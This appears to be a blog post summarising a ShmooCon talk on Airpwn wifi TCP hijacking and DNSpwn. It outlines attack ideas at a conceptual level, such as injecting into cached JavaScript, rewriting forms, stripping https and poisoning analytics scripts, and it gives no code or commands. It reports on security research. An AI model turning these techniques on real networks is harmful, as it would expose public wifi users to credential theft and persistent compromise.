Airpwn TCP hijack, we’re serious this time

For having to fill a last minute ShmooCon opening, dragorn delivered a very provoking talk. You may know him for his indispensable wifi tool, Kismet. He blew through 100 slides in 20 minutes and I’m sure I’ll miss the finer points but it really turned out to be something potentially incredible (and destructive). He laid the ground work by discussing how open public wifi hotspots are so heavily used. Many of us understand the risk but he set out to show even more unexplored territory.

802.11 traffic is trivial to capture and as Toast demonstrated at Defcon, easily injectable with airpwn. Many people saw this but the full implications weren’t really understood so dragorn decided to expand on the idea. The team built a new version of Airpwn TCP hijack for the Metasploit framework. It now supports full content replacement using regex and a very fast ruby-based packet assembler.

dragorn outlined the many ways you could use this. You could modify one of the many helper .js files that browsers download while loading pages. You could rewrite the DOM to your benefit, change all forms to go through your proxy, or change all https to plain http.

These attacks could be made persistent by telling the browser to cache the .js for an extremely long time (10 years even) as rsnake described in his VPN research. Then when the user returned to their home intranet the exploit would still be viable; it could even phone home to get new .js payloads. Want to make the attack really generic? Poison Urchin.js, the code that every site using Google Analytics makes you load.

What’s the answer? Securing your connection with a VPN perhaps. This doesn’t really help the average user though because it’s difficult to do. If your splash start page is http which hands off the login to https, the attacker could hijack you starting with that very first page before you’re in the VPN.

dragorn also built DNSpwn DNS hijack. You can use it to poison someone’s DNS so that it persists even when they switch to a VPN.

This is one of those attacks that could be easily missed by expert users. At the end of his talk, dragorn lamented, “I’ve ruined wifi for myself.”


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.